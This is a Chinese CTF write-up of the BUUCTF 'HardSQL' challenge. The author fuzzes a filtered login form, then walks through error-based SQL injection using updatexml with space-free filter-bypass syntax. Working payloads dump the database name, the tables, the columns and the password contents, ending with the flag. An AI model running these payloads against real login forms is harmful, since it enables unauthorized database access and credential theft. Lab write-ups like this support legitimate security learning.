当前位置: 首页 > news >正文

[极客大挑战 2019]HardSQL1 BUUCTF 做题记录

输入用户名和密码,使用常见的注入语句,被拦了

联合查询也被拦,感觉是有黑名单了,常见的语句关键词都被拦掉了,进burp爆破一下看看哪些还能用。

SQL字典地址d6dcb-代码预览-SQL注入fuzz字典介绍:基于网络安全的SQL注入fuzz字典项目 - AtomGit | GitCode

通过观察返回内容发现只有返回长度804的没有被屏蔽

还有一个比较别致的1031,打开Response看一下

诶嘿,这里报错了,那应该可以通过报错来进行注入?

其实到这里知识储备就不够了,去看了别人的wp,发现确实是通过报错泄露表明等信息,使用的函数主要是两个

extractvalue()和updatexml()

UPDATEXML(xml_target, xpath_expr, new_value)
参数名称含义类型要求
第一个xml_target要被修改的XML文档(字符串形式)合法的XML片段
第二个xpath_exprXPath表达式,用于定位要修改的节点合法的XPath路径
第三个new_value替换后的新值(字符串)任意字符串

EXTRACTVALUE(xml_fragment, xpath_expression)

参数名称含义
第一个xml_fragment一个XML 格式的字符串。函数会解析这个字符串作为 XML 文档。
第二个xpath_expressionXPath 表达式,用于定位要提取的节点。格式需符合 XPath 语法,例如/root/child//item等。

一个正确的函数调用格式为

<book> <title>SQL入门</title> <price>59.0</price> </book> -- 示例1:将价格改为 99.0 sql SELECT UPDATEXML( '<book><title>SQL入门</title><price>59.0</price></book>', '/book/price', '99.0' );

如果我们这样构造一个username

admin'^updatexml(1,concat(0x7e,database(),0x7e))#

这里0x7e的作用是让它报错,否则可能格式对了就不报错了

(经过主包多次尝试发现空格被过滤了......)成功爆出数据库名

然后爆表名

1'^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e),1)#

字段名

1'^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1)#

爆字段,猜测在password里

1'^updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1)#

只爆出来一半,加个right函数再爆另一半

1'^updatexml(1,concat(0x7e,right((select(group_concat(password))from(H4rDsq1)),30),0x7e),1)#

拼接一下得到flag

flag{79316be2-abe3-414a-8c5e-b6fa7444de2f}

http://www.jsqmd.com/news/671720/

相关文章:

  • 2026软件安全趋势解析:攻防迭代下,企业该如何破局?
  • 如何选择售后完善的职业技能培训院校,口碑好的基地推荐 - 工业品网
  • excel中常用的条件表达式
  • 前沿解读:AI Native应用的用户体验设计原则
  • 别再混淆X11的Client/Server了!用Xvnc和xclock手把手演示远程图形显示的底层逻辑
  • Java的ProcessHandle:现代进程管理API
  • Windows更新修复终极指南:一键解决更新卡顿、失败与错误代码问题
  • 别再死记硬背公式了!用Excel 5分钟搞定EOQ经济订货批量计算(附模板)
  • 2026水上乐园设备与设计建造:亲子游乐、滑梯造浪等设施定制之选 ! - 速递信息
  • 盘点2026年靠谱的微波干燥机厂家,定制化化工微波干燥设备推荐 - 工业设备
  • 2.2 Win_server虚拟机搭IIS网站
  • 你以为论文查重是“测谎仪”?好写作AI告诉你,它其实是一场“源头阻击战”
  • 2026年上海银焊条回收与银浆回收公司推荐:贵金属精炼服务选型指南 - 品牌推荐官
  • Blazor Server vs WebAssembly vs Auto渲染模式选型决策图谱,2026企业级项目架构师都在用的5维评估模型
  • 告别重复劳动:30个Illustrator脚本让你的设计效率提升300%
  • 从SGM到PatchMatch:手把手带你用Python复现立体匹配核心算法(附避坑指南)
  • 简单三步让Windows系统焕然一新:Win11Debloat终极优化指南
  • 5个惊艳功能:快速掌握Ryujinx模拟器的核心用法
  • 2026年电机调速变频器厂家品牌推荐榜:工业节能降耗/固态软起动器/太阳能光伏变频器/内置旁路软起动器/软起动器多曲线控制 - 品牌策略师
  • 2026大学哪些经济学专业证书值得考
  • Dify插件开发实战指南:手把手完成OAuth2集成、LLM路由与状态持久化(附GitHub高星模板)
  • 聚焦技能培养 甘肃国方高级技工学校:中专/职高/3+2大专多元办学赋能青春 - 深度智识库
  • 告别盲调!用Python+EXIT Chart可视化分析你的LDPC码性能(附完整代码)
  • 2026年,谁将引领国内户外广告机品牌口碑新风向?
  • 性价比高的行政赔偿律师推荐,掌握服务咨询方式与免费咨询机会 - 工业推荐榜
  • 3分钟掌握RoundedTB:让Windows任务栏焕然一新的终极美化工具
  • PyCharm新手入门全教程:从下载安装到创建你的第一个项目
  • 小白友好:FLUX.2-Klein-9B镜像部署与使用,图片编辑不求人
  • 华硕笔记本终极控制方案:10MB轻量级工具G-Helper完全指南
  • 从手动翻译到批量搞定:一个跨境小白学会多语言商品图翻译的全过程记录